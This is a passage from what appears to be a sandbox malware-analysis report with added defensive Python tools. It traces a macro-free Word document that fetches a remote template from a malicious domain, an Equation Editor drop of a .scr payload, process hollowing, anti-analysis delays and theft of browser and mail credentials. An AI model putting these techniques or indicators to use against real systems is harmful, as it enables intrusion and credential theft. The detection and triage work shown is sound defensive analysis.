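    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    first_section = coff + 20 + opt_size
    sections = {}
    for i in range(nsections):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ... (40 bytes)
        hdr = struct.unpack_from("<8sIIIIIIHHI", image, first_section + 40 * i)
        name = hdr[0].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = hdr[3], hdr[4]
        sections[name] = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
    return {"timestamp": stamp, "sections": sections}


def triage(image: bytes, now_unix: int, entropy_threshold: float = 7.0) -> list:
    """Findings worth acting on; the entropy threshold is an assumed cut-off."""
    info = parse_pe(image)
    findings = []
    if info["timestamp"] > now_unix:
        when = pe_timestamp(info["timestamp"]).strftime("%Y-%m-%d %H:%M:%S")
        findings.append("build timestamp in the future: %s UTC" % when)
    for name, ent in info["sections"].items():
        if ent >= entropy_threshold:
            findings.append("high entropy section %s: %.2f bits/byte" % (name, ent))
    return findings


def build_sample_pe(stamp: int, text_data: bytes) -> bytes:
    """Constructed minimal 32-bit PE with a single .text section holding text_data."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature follows the DOS header
    # i386, one section, the given timestamp, no optional header, EXECUTABLE_IMAGE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 0, 0x0102)
    raw_ptr = 64 + 4 + 20 + 40
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_data), 0x1000,
                          len(text_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + section + text_data


if __name__ == "__main__":
    sample = build_sample_pe(0x922C3AB8, bytes(range(256)))
    for line in triage(sample, now_unix=1719792000):  # 2024-07-01 as "now" (assumption)
        print(line)
```

A future timestamp on its own is weak evidence (some toolchains zero or randomise it, and Go and reproducible builds use fixed values), but a future stamp together with a near-8.0 .text section on a file that arrives as .scr from Equation Editor is the combination this report shows.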

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRoot
Source: settings.xml.rels Extracted files from sample: https://riell.top/obb.doc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obi23456.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: obb[1].doc.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 91894CAD.doc.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
Source: C:\Users\user\AppData\Roaming\obi23456.scr Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
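The document itself carries no VBA (OLE indicators vbamacros = False); the initial access is the external attachedTemplate relationship in word/_rels/settings.xml.rels pointing at https://riell.top/obb.doc, which Word resolves through the WebDAV Mini-Redirector (the \\riell.top@SSL\DavWWWRoot open above, with netapi32.dll and davhlpr.dll loaded). Pulling that relationship out of a .docx is a one-pass zip and XML walk, shown below as an added example that is not part of the sandbox output. The .docx it parses is constructed in memory so the script runs offline; only the template URL is taken from the report. Part names and relationship types are the OOXML ones; defusedxml is the safer parser for untrusted input in production.

```python
"""Recover external (remote-template) relationships from a .docx.

Added example, not part of the sandbox report. The document is built in
memory below so the check runs offline; its attachedTemplate target is the
URL the report extracted from word/_rels/settings.xml.rels.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_relationships(docx_bytes: bytes) -> list:
    """Every relationship in any .rels part whose TargetMode is External.

    Internal relationships name parts inside the zip; an External one makes
    Word fetch the target, which is how a macro-free .docx reaches out to a
    remote template. Use defusedxml instead of ElementTree for untrusted input.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                found.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return found


def remote_template_urls(docx_bytes: bytes) -> list:
    """Only attachedTemplate targets declared in word/_rels/settings.xml.rels."""
    return [r["target"] for r in external_relationships(docx_bytes)
            if r["part"] == "word/_rels/settings.xml.rels"
            and r["type"] == "attachedTemplate"]


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Constructed minimal .docx; with template_url=None it has no external link."""
    rel = ""
    attached = ""
    if template_url is not None:
        rel = (f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
               f'Target="{template_url}" TargetMode="External"/>')
        attached = '<w:attachedTemplate r:id="rId1"/>'
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "_rels/.rels":
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/document.xml": f'<w:document xmlns:w="{WML_NS}"><w:body/></w:document>',
        "word/settings.xml":
            f'<w:settings xmlns:w="{WML_NS}" xmlns:r="{OFFICE_REL}">{attached}</w:settings>',
        "word/_rels/settings.xml.rels": f'<Relationships xmlns="{REL_NS}">{rel}</Relationships>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("https://riell.top/obb.doc")  # URL from the report
    for rel in external_relationships(sample):
        print(rel["part"], rel["type"], rel["target"])
```

Walking every .rels part rather than only settings.xml.rels matters: oleObject, hyperlink and frame relationships can also be External, and a detection keyed only on attachedTemplate misses those variants.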

Malware Analysis System Evasion

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (44 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process information set: NOOPENFILEERRORBOX (81 identical entries)
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 260000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 2160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 1E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 1C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 2350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: 340000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\obi23456.scr Window / User API: threadDelayed 9713
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3340 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3532 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616 Thread sleep time: -7800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620 Thread sleep count: 9713 > 30
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620 Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\obi23456.scr Thread delayed: delay time: 600000

Anti Debugging

Source: C:\Users\user\AppData\Roaming\obi23456.scr Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 10_2_001CFCB8 LdrInitializeThunk, 10_2_001CFCB8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Users\user\AppData\Roaming\obi23456.scr Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
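The three lines above are the whole execution chain in telemetry terms: Equation Editor (which should never spawn anything) starts a .scr from AppData\Roaming, that .scr starts a second copy of itself, and the first copy then writes an MZ header to the second copy's image base 0x400000, which together with the UpdatedRunpe PDB path above is RunPE-style process hollowing. The script below is an added example, not part of the sandbox output: it parses lines in the report's own "Source: ... Process created: ..." and "Memory written: ..." format and applies the same rules the Sigma hits in the report express (Suspicious Microsoft Office Child Process, Equation Editor child, self-spawn followed by an MZ write). Rule names and the parent/extension lists are this example's own; the three malicious input lines are copied from the report and the benign fourth line is constructed.

```python
"""Turn the report's process-creation and memory-write lines into detections.

Added example, not part of the sandbox report. The malicious input lines are
copied from the HIPS / PFW section in the report's own "Source: ..." format;
the benign line is constructed. Rule names and allow/deny lists are this
example's assumptions, not Joe Sandbox or Sigma identifiers.
"""
import re
from pathlib import PureWindowsPath

PROC_RE = re.compile(r'^Source: (?P<parent>.+?) Process created: (?P<child>.+?) "(?P<cmd>.*)"$')
WRITE_RE = re.compile(r'^Source: (?P<writer>.+?) Memory written: (?P<target>.+?) '
                      r'base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)$')

# Office processes that should not spawn executables; Equation Editor never should.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
DISGUISED_EXT = (".scr", ".pif", ".com")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze(lines) -> list:
    """Return alert strings in input order."""
    alerts = []
    self_spawned = set()  # images that launched a copy of themselves
    for line in lines:
        m = PROC_RE.match(line.strip())
        if m:
            parent, child = m["parent"], m["child"]
            pb, cb = basename(parent), basename(child)
            if pb in OFFICE_PARENTS:
                alerts.append(f"office-child: {pb} spawned {cb}")
            if parent.lower() == child.lower():
                self_spawned.add(child.lower())
                alerts.append(f"self-spawn: {cb} started a second copy of itself")
            if cb.endswith(DISGUISED_EXT) and any(d in child.lower() for d in USER_WRITABLE):
                alerts.append(f"suspicious-extension: {cb} executed from a user-writable path")
            continue
        m = WRITE_RE.match(line.strip())
        if m and m["magic"].upper().startswith("4D5A"):
            writer, target = m["writer"], m["target"]
            # An MZ header written into a freshly spawned copy of the writer
            # is the hollowing pattern; into any other process, generic injection.
            kind = ("hollowing" if target.lower() in self_spawned and writer.lower() == target.lower()
                    else "injection")
            alerts.append(f"{kind}: {basename(writer)} wrote an MZ header into "
                          f"{basename(target)} at base 0x{m['base'].upper()}")
    return alerts


SAMPLE_LINES = [
    # Three lines from the report, then one constructed benign control line.
    r'Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"',
    r'Source: C:\Users\user\AppData\Roaming\obi23456.scr Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"',
    r'Source: C:\Users\user\AppData\Roaming\obi23456.scr Memory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5A',
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES):
        print(alert)
```

The report lines identify processes by image path only, so the hollowing rule infers "parent wrote into its own child" from the preceding self-spawn; on EDR telemetry key the same logic on process and target PIDs (the report's PIDs 3376 and 3404) instead.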

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Roaming\obi23456.scr Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation
Source: C:\Users\user\AppData\Roaming\obi23456.scr Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\obi23456.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\obi23456.scr File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR